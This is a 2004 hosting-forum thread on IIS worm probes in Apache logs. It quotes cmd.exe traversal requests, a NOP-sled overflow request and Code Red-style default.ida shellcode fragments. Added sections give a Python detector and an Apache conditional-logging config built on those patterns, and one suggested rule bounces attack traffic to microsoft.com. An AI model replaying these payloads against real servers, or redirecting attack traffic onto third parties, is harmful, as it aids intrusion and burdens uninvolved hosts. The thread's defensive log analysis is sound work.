x90\x90\


ret
07-01-2004, 01:17 AM
my access log contains x90\x90\

What's that again? Log file full? Or attempts at being hacked?

2.3M access_log
2.9M access_log.1
34M access_log.2
39M access_log.3
55M access_log.4

jlasman
07-01-2004, 01:31 AM
Just x90\x90\ on a line of its own?

Can you please show us an example in context?

Thanks.

Jeff

ret
07-01-2004, 01:41 AM
81.241.202.87 - - [29/Jun/2004:21:34:51 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 - "-" "-"
81.241.202.87 - - [29/Jun/2004:21:34:53 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 - "-" "-"
81.241.202.87 - - [29/Jun/2004:21:34:55 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
81.241.202.87 - - [29/Jun/2004:21:34:56 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
81.241.202.87 - - [29/Jun/2004:21:34:58 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
81.241.202.87 - - [29/Jun/2004:21:34:59 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
81.241.202.87 - - [29/Jun/2004:21:35:03 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
81.241.202.87 - - [29/Jun/2004:21:35:04 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"


Trying to find Windows exploits or so?
This is my log file filled with
90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 414 271 "-" "-"
61.220.98.26 - - [30/Jun/2004:20:27:00 +0200] "GET /sumthin HTTP/1.0" 404 - "-" "-"
82.49.98.55 - - [01/Jul/2004:07:13:36 +0200] "CONNECT 207.46.133.140:21 HTTP/1.0" 403 - "-" "-"
80.109.27.118 - - [01/Jul/2004:09:43:10 +0200] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 - "-" "-"

jlasman
07-01-2004, 01:56 AM
It looks as if they may be attempted windows exploits.

But I'm not sure.

Jeff

ret
07-01-2004, 03:02 AM
81.23xxxx - - [29/Jun/2004:15:32:18 +0200] "SEARCH /\x90\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\

toml
07-01-2004, 08:00 AM
They are looking for buffer overflows; if you noticed, that request is over 32k. I have been getting a bunch of these too lately.
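
Detection logic run over the kinds of lines quoted in this thread, as an added example (not code from any of the posters or from DirectAdmin). It parses Apache common/combined log lines, tags the IIS directory-traversal probes (%255c is a double-encoded backslash, %c1%1c and %c0%af are overlong UTF-8 for backslash and slash), the cmd.exe/root.exe requests, the default.ida request of the Code Red worm family, and long runs of \xNN escaped bytes (Apache's rendering of raw bytes such as a 0x90 NOP sled), then counts tags per source host so an operator can see which hosts are noisy before deciding whether to block anything. The log lines embedded in it are constructed to mirror the ones above, with placeholder addresses; the tag names and the 32-byte threshold are my own choices.

```python
"""Tag IIS worm/exploit probes in Apache access-log lines.

Added example for this thread; not code posted by anyone in it.
"""
import re
from collections import Counter

# Apache common/combined format. The request field is quoted, and Apache
# writes non-printable bytes in it as \xNN, so a raw 0x90 NOP sled shows up
# in the file as the literal text \x90\x90\x90...
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>.*)" '
    r'(?P<status>\d{3}) (?P<bytes>-|\d+)'
)

# Patterns taken from the requests quoted in the thread; labels are my own.
SIGNATURES = [
    ("code-red-default.ida", re.compile(r"GET /default\.ida\?", re.I)),
    ("iis-cmd-or-root.exe", re.compile(r"/(cmd|root)\.exe\?", re.I)),
    # %255c = double-encoded '\', %c1%1c / %c0%af = overlong UTF-8 '\' and '/'
    ("iis-unicode-traversal", re.compile(r"\.\.(%255c|%c1%1c|%c0%af|%5c)", re.I)),
    ("sumthin-probe", re.compile(r"GET /sumthin ")),
]
ESCAPED_BYTE = re.compile(r"\\x[0-9a-fA-F]{2}")
MIN_SLED_BYTES = 32  # escaped bytes before calling it a binary payload (assumption)


def classify(line):
    """Return (host, status, tags) for one log line, or None if it does not parse.

    tags is a list of strings; an empty list means the line looks benign.
    """
    m = LOG_RE.match(line)
    if not m:
        return None
    req = m.group("request")
    tags = [label for label, pat in SIGNATURES if pat.search(req)]
    escaped = len(ESCAPED_BYTE.findall(req))
    if escaped >= MIN_SLED_BYTES:
        tags.append(f"binary-payload:{escaped}-escaped-bytes")
    if m.group("status") == "414":
        # Apache refused the URI as too long before any handler or alias rule ran
        tags.append("rejected-414")
    return m.group("host"), m.group("status"), tags


def summarize(lines):
    """Count probe tags per source host so an operator can decide what to block."""
    per_host = {}
    for line in lines:
        parsed = classify(line)
        if parsed is None:
            continue
        host, _status, tags = parsed
        if tags:
            per_host.setdefault(host, Counter()).update(tags)
    return per_host


# Constructed sample lines modelled on the thread's; hosts and times are placeholders.
SAMPLE_LOG = [
    r'192.0.2.10 - - [29/Jun/2004:21:34:51 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 - "-" "-"',
    r'192.0.2.10 - - [29/Jun/2004:21:34:58 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"',
    r'192.0.2.10 - - [29/Jun/2004:21:35:04 +0200] "GET /msadc/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"',
    r'192.0.2.20 - - [30/Jun/2004:20:27:00 +0200] "GET /sumthin HTTP/1.0" 404 - "-" "-"',
    r'192.0.2.30 - - [29/Jun/2004:15:32:18 +0200] "SEARCH /' + r"\x90" * 64 + r' HTTP/1.1" 414 271 "-" "-"',
    r'192.0.2.40 - - [08/Jul/2004:12:29:40 +0200] "GET /default.ida?' + "X" * 40 + r'%u9090%u6858%ucbd3%u7801 HTTP/1.0" 404 - "-" "-"',
    r'192.0.2.50 - - [01/Jul/2004:10:00:00 +0200] "GET /index.html HTTP/1.1" 200 1234 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for host, counts in sorted(summarize(SAMPLE_LOG).items()):
        print(host, dict(counts))
```

Run it against a real access_log by feeding `open("access_log")` to `summarize()`; the per-host counts are what you want in front of you before banning a range, since a single worm-infected host and a deliberate scanner look identical in these lines.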

kriak
07-01-2004, 08:36 AM
I have the same logs.

Do you have an idea as to how we could avoid logging these?

ret
07-01-2004, 08:38 AM
I just ban their IP range.

ret
07-01-2004, 09:11 AM
got this from another forum:


# RedirectMatch is a mod_alias directive, not mod_rewrite, so test for that module
<IfModule mod_alias.c>
RedirectMatch permanent (.*)cmd\.exe(.*)$ http://www.microsoft.com
RedirectMatch permanent (.*)root\.exe(.*)$ http://www.microsoft.com
RedirectMatch permanent (.*)\/_vti_bin\/(.*)$ http://www.microsoft.com
RedirectMatch permanent (.*)\/scripts\/\.\.(.*)$ http://www.microsoft.com
RedirectMatch permanent (.*)\/_mem_bin\/(.*)$ http://www.microsoft.com
RedirectMatch permanent (.*)\/msadc\/(.*)$ http://www.microsoft.com
RedirectMatch permanent (.*)\/MSADC\/(.*)$ http://www.microsoft.com
RedirectMatch permanent (.*)\/c\/winnt\/(.*)$ http://www.microsoft.com
RedirectMatch permanent (.*)\/d\/winnt\/(.*)$ http://www.microsoft.com
# the "\x90" in the log is Apache escaping a raw 0x90 byte; the text "x90" never
# appears in the request, so this rule will not match the NOP-sled requests
RedirectMatch permanent (.*)\/x90\/(.*)$ http://www.microsoft.com
</IfModule>

maybe this is a good solution? redirect requests?

kriak
07-01-2004, 09:19 AM
Put that in httpd.conf and it works fine.

It still won't prevent log accumulation.

DirectAdmin Support
07-01-2004, 11:23 AM
Originally posted by ret
got this from another forum:


# RedirectMatch is a mod_alias directive, not mod_rewrite, so test for that module
<IfModule mod_alias.c>
RedirectMatch permanent (.*)cmd\.exe(.*)$ http://www.microsoft.com
RedirectMatch permanent (.*)root\.exe(.*)$ http://www.microsoft.com
RedirectMatch permanent (.*)\/_vti_bin\/(.*)$ http://www.microsoft.com
RedirectMatch permanent (.*)\/scripts\/\.\.(.*)$ http://www.microsoft.com
RedirectMatch permanent (.*)\/_mem_bin\/(.*)$ http://www.microsoft.com
RedirectMatch permanent (.*)\/msadc\/(.*)$ http://www.microsoft.com
RedirectMatch permanent (.*)\/MSADC\/(.*)$ http://www.microsoft.com
RedirectMatch permanent (.*)\/c\/winnt\/(.*)$ http://www.microsoft.com
RedirectMatch permanent (.*)\/d\/winnt\/(.*)$ http://www.microsoft.com
# the "\x90" in the log is Apache escaping a raw 0x90 byte; the text "x90" never
# appears in the request, so this rule will not match the NOP-sled requests
RedirectMatch permanent (.*)\/x90\/(.*)$ http://www.microsoft.com
</IfModule>

maybe this is a good solution? redirect requests?


Haha.. too funny. :)

John

jlasman
07-01-2004, 11:43 AM
Originally posted by DirectAdmin Support
Haha.. too funny. :)
I wonder how many people the humor is lost on.

For anyone who can't figure it out, what that does is whenever someone tries an IIS-based vulnerability attack on your server it gets redirected to the Microsoft website.

As kriak pointed out, it won't help your logs any, and it does impact Microsoft to some minor extent. Under US law and under Washington law, redirecting to Microsoft could be illegal, and might even be a criminal act.

Jeff

sander815
07-01-2004, 12:57 PM
OK, thanks Jeff.

toml
07-01-2004, 02:11 PM
You could try:
# RedirectMatch is a mod_alias directive, not mod_rewrite, so test for that module
<IfModule mod_alias.c>
RedirectMatch permanent (.*)cmd\.exe(.*)$ http://127.0.0.1
RedirectMatch permanent (.*)root\.exe(.*)$ http://127.0.0.1
RedirectMatch permanent (.*)\/_vti_bin\/(.*)$ http://127.0.0.1
RedirectMatch permanent (.*)\/scripts\/\.\.(.*)$ http://127.0.0.1
RedirectMatch permanent (.*)\/_mem_bin\/(.*)$ http://127.0.0.1
RedirectMatch permanent (.*)\/msadc\/(.*)$ http://127.0.0.1
RedirectMatch permanent (.*)\/MSADC\/(.*)$ http://127.0.0.1
RedirectMatch permanent (.*)\/c\/winnt\/(.*)$ http://127.0.0.1
RedirectMatch permanent (.*)\/d\/winnt\/(.*)$ http://127.0.0.1
# the "\x90" in the log is Apache escaping a raw 0x90 byte; the text "x90" never
# appears in the request, so this rule will not match the NOP-sled requests
RedirectMatch permanent (.*)\/x90\/(.*)$ http://127.0.0.1
</IfModule>

kriak
07-01-2004, 04:10 PM
I like the 127.0.0.1 as a solution. With a little luck, it would slow the attacker!

By attacker, I wouldn't come to the conclusion of a deliberate hacker attempt: it may also be some kind of worm trying to spread using a known exploit on Windows-based systems, as we have seen much too often these last months. That's why I wouldn't be too prompt on blocking an IP range solely based on these logs.

sander815
07-08-2004, 09:56 AM
Is this a similar Windows exploit?
81.23.206.226 - - [08/Jul/2004:12:29:40 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 - "-" "-"

sander815
07-08-2004, 10:00 AM
Originally posted by toml
You could try:
# RedirectMatch is a mod_alias directive, not mod_rewrite, so test for that module
<IfModule mod_alias.c>
RedirectMatch permanent (.*)cmd\.exe(.*)$ http://127.0.0.1
RedirectMatch permanent (.*)root\.exe(.*)$ http://127.0.0.1
RedirectMatch permanent (.*)\/_vti_bin\/(.*)$ http://127.0.0.1
RedirectMatch permanent (.*)\/scripts\/\.\.(.*)$ http://127.0.0.1
RedirectMatch permanent (.*)\/_mem_bin\/(.*)$ http://127.0.0.1
RedirectMatch permanent (.*)\/msadc\/(.*)$ http://127.0.0.1
RedirectMatch permanent (.*)\/MSADC\/(.*)$ http://127.0.0.1
RedirectMatch permanent (.*)\/c\/winnt\/(.*)$ http://127.0.0.1
RedirectMatch permanent (.*)\/d\/winnt\/(.*)$ http://127.0.0.1
# the "\x90" in the log is Apache escaping a raw 0x90 byte; the text "x90" never
# appears in the request, so this rule will not match the NOP-sled requests
RedirectMatch permanent (.*)\/x90\/(.*)$ http://127.0.0.1
</IfModule>

And where would I add this?

kriak
07-08-2004, 11:09 AM
Originally posted by sander815
is this a similar windows exploit?
81.23.206.226 - - [08/Jul/2004:12:29:40 +0200] "GET /default.ida?... HTTP/1.0" 404 - "-" "-"

It surely is the same kind of exploit (buffer overflow).

Webcart
07-09-2004, 09:34 PM
If you really want to "protect" your logs, you might consider Progressive IP blocking (http://vamos-wentworth.org/bottrap/bottrap.html). I personally don't like an idea of automatic changes of firewall rules like that, but to each his own.

Conditional logging (http://httpd.apache.org/docs/logs.html#conditional) will probably be the easiest way to go, though.
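
The conditional-logging approach Webcart points to, written out as an added example (not configuration from the thread or from DirectAdmin). It tags the probe patterns quoted in this thread with SetEnvIf, answers them with toml's 127.0.0.1 redirect from mod_alias (the module RedirectMatch actually belongs to), and keeps them out of the main access log. The log paths, the variable name iis_probe and the probe-log format are assumptions; check them against your own httpd.conf. Two caveats: these worms do not follow redirects, so the 301 is cosmetic and the response is merely short; and the 32k sled requests that Apache refused with 414 are rejected before request processing, so they may still land in the log regardless of the env= condition.

```apache
# Added example for this thread; not from the original posts or from DirectAdmin.
# Log paths and the variable name "iis_probe" are assumptions.

# 1. Tag the probes seen in the thread. SetEnvIfNoCase so /msadc and /MSADC
#    both match; Request_URI is the path part of the request line.
SetEnvIfNoCase Request_URI "(cmd|root)\.exe"                 iis_probe
SetEnvIfNoCase Request_URI "/(_vti_bin|_mem_bin|msadc)/"     iis_probe
SetEnvIfNoCase Request_URI "/scripts/\.\."                   iis_probe
SetEnvIfNoCase Request_URI "/[cd]/winnt/"                    iis_probe
SetEnvIfNoCase Request_URI "^/default\.ida"                  iis_probe
# Only if this server exposes no WebDAV: the long SEARCH requests are overflow probes.
SetEnvIf Request_Method "^SEARCH$"                           iis_probe

# 2. Answer the traversal and default.ida probes with a tiny response.
#    RedirectMatch is a mod_alias directive, so that is the module to test for
#    (the snippet in the thread tested mod_rewrite instead).
<IfModule mod_alias.c>
RedirectMatch permanent (cmd|root)\.exe   http://127.0.0.1/
RedirectMatch permanent ^/default\.ida    http://127.0.0.1/
</IfModule>

# 3. Keep tagged requests out of the main log. Write them, reduced to the
#    fields needed for counting, to a separate file you can rotate or discard.
CustomLog /var/log/httpd/access_log combined env=!iis_probe
CustomLog /var/log/httpd/probes_log "%h %t \"%r\" %>s" env=iis_probe
```

Put this in the global section of httpd.conf or inside the affected VirtualHost, check it with `apachectl configtest`, and restart. The probes_log keeps the evidence kriak wants before an IP range is blocked, while the access_log stays the size of your real traffic.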